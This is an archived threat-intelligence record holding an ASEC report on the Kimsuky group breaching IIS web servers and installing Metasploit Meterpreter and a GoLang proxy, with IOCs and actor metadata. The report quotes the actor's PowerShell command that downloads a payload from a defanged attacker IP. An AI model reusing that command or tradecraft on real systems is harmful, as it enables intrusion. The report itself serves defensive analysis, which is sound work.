{
	"id": "a5ed9fd4-4eab-4664-be85-84a880e8a0c0",
	"created_at": "2026-04-06T00:12:54.246588Z",
	"updated_at": "2026-04-10T03:37:41.202108Z",
	"deleted_at": null,
	"sha1_hash": "a55bce1b78a4e0b12a68df701fb97b65189ad579",
	"title": "Kimsuky Group Using Meterpreter to Attack Web Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2159023,
	"plain_text": "Kimsuky Group Using Meterpreter to Attack Web Servers - ASEC\r\nBy ATCP\r\nPublished: 2023-05-14 · Archived: 2026-04-05 19:15:42 UTC\r\nAhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of malware\r\ntargeting web servers by Kimsuky group. Kimsuky is a threat group deemed supported by North Korea and has\r\nbeen active since 2013. At first, they attacked North Korea-related research institutes in South Korea before\r\nattacking a Korean energy corporation in 2014. Since 2017, their attacks have been targeting countries other than\r\nSouth Korea as well. [1] ASEC has been providing the analysis of various cases of Kimsuky attacks on the ASEC\r\nBlog, mainly spear phishing attacks which involved malicious file attachments to emails in MS Office document\r\nfiles[2],  OneNote [3], or CHM [4]file formats. Kimsuky group usually uses social engineering attacks like the\r\naforementioned spear phishings, but this post will cover the attack cases that targeted web servers. After a\r\nsuccessful breach, Kimsuky installed the Metasploit Meterpreter backdoor malware. There have also been\r\nidentified logs of a proxy malware developed in GoLang being installed. \r\n1. Attack Cases Targeting IIS Web Servers\r\nThe attack target was a Windows IIS web server of a Korean construction company and is thought to have a\r\nvulnerability not applied or be inadequately managed. The threat actor breached the IIS web server and executed a\r\nPowershell command. The following is a log from AhnLab Smart Defense (ASD) which shows w3wp.exe, a\r\nWindows IIS web server process, using Powershell to download an additional payload from outside. \r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 1 of 6\n\nFigure 1. Log of IIS web server process executing a Powershell command\r\nThe executed Powershell command is as follows, and the downloaded “img.dat” file is a backdoor malware also\r\nknown as Metasploit Meterpreter. \r\n\u003e powershell.exe invoke-webrequest -uri “hxxp://45.58.52[.]82/up.dat” -outfile\r\n“c:\\programdata\\img.dat” \r\nAfterward, the threat actor used Meterpreter to install proxy malware additionally. Powershell command was used\r\nhere as well.\r\nFigure 2. Proxy malware installed by Meterpreter\r\n1. Meterpreter Malware\r\nMetasploit is a penetration testing framework They are tools that can be used to inspect security vulnerabilities for\r\nnetworks and systems of companies and organizations, providing various features for each penetration test stage.\r\nMeterpreter is a backdoor provided by Metasploit and can perform various malicious behaviors by receiving\r\ncommands from the threat actor. Because Metasploit is an open-source tool, it is being favored by various threat\r\nactors, and this is the same for the Kimsuky group. The ASEC Blog also covered cases of the Kimsuky group\r\nusing Meterpreter alongside AppleSeed in their attacks. [5] [6] In addition, aside from the fact that the C\u0026C\r\naddress used in the attack had been used by the Kimsuky group in the past, the method of having the regsvr32.exe\r\nprocess running the malware is the same as the method used by the Kimsuky group from the past. The malware\r\nused in the attacks is in DLL file format and runs after being loaded by the regsvr32.exe process.\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 2 of 6\n\nFigure 3. Meterpreter running after being loaded by the regsvr32.exe process\r\nWhat’s different than usual is that the Meterpreter Stager is developed in GoLang. In the past, the Kimsuky group\r\ndeveloped their own malware, or packed it with a packer such as VMProtect when distributing the malware. The\r\nproxy malware is also developed in GoLang, and the malware will be discussed below. We can assume this as\r\nrecently distributed malware being developed in GoLang to evade detection.\r\nFigure 4. Meterpreter Stager developed in GoLang\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 3 of 6\n\nFigure 5. Stager downloading Meterpreter\r\n1. Proxy (GoLang) Malware\r\nAfterwards, Meterpreter receives a command from the threat actor, executing a Powershell command and\r\ninstalling additional malware. The malware downloaded through the Powershell command is malware that has a\r\nproxy feature. Additionally, Kimsuky group has continuously been using proxy malware in their attack processes\r\nin the past. [7] A trait unique to this malware would be that it is developed in GoLang, unlike past versions.\r\nFigure 6. GoLang functions of the proxy malware\r\nThe proxy malware used in this attack receives 2 IP addresses and port numbers from the command line argument\r\nto relay them. A difference between this and past proxy tools is that the string “aPpLe” is used as a signature\r\npresumed to be used for a verification process during communications. Considering the fact that the RDP port\r\n“127.0.0.1:3389” is used as an example when the malware is executed, it is assumed that the purpose of the threat\r\nactor using a proxy malware is for RDP connection to the infected system in later stages.\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 4 of 6\n\nFigure 7. Proxy malware packet\r\n1. Conclusion\r\nKimsuky group’s attack targeting Windows IIS web server has recently been found. Looking at the log, it is\r\npresumed that the Kimsuky group attacks web servers that are poorly managed or have vulnerabilities with\r\npatches not applied. After a successful breach, Meterpreter was installed in the target systems for the threat actor\r\nto gain control over the web server. Thus, server managers must patch the server so that it is up to date and\r\npractice prevention of known vulnerabilities being exploited. Moreover, for externally open servers, protection\r\nsoftware must be used to restrict external access. Also, V3 should be updated to the latest version so that malware\r\ninfection can be prevented. File Detection – Backdoor/Win.Meterpreter.C5427507 (2023.05.15.02) –\r\nHackTool/Win.Proxy.C5427508 (2023.05.15.02) \r\nMD5\r\n000130a373ea4085b87b97a0c7000c86\r\n6b2062e61bcb46ce5ff19b329ce31b03\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//45[.]58[.]52[.]82/cl[.]exe\r\nhttp[:]//45[.]58[.]52[.]82/up[.]dat\r\nhttp[:]//45[.]58[.]52[.]82[:]8443/\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 5 of 6\n\nSource: https://asec.ahnlab.com/en/53046/\r\nhttps://asec.ahnlab.com/en/53046/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/53046/"
	],
	"report_names": [
		"53046"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434374,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.pdf",
		"text": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.txt",
		"img": "https://archive.orkl.eu/a55bce1b78a4e0b12a68df701fb97b65189ad579.jpg"
	}
}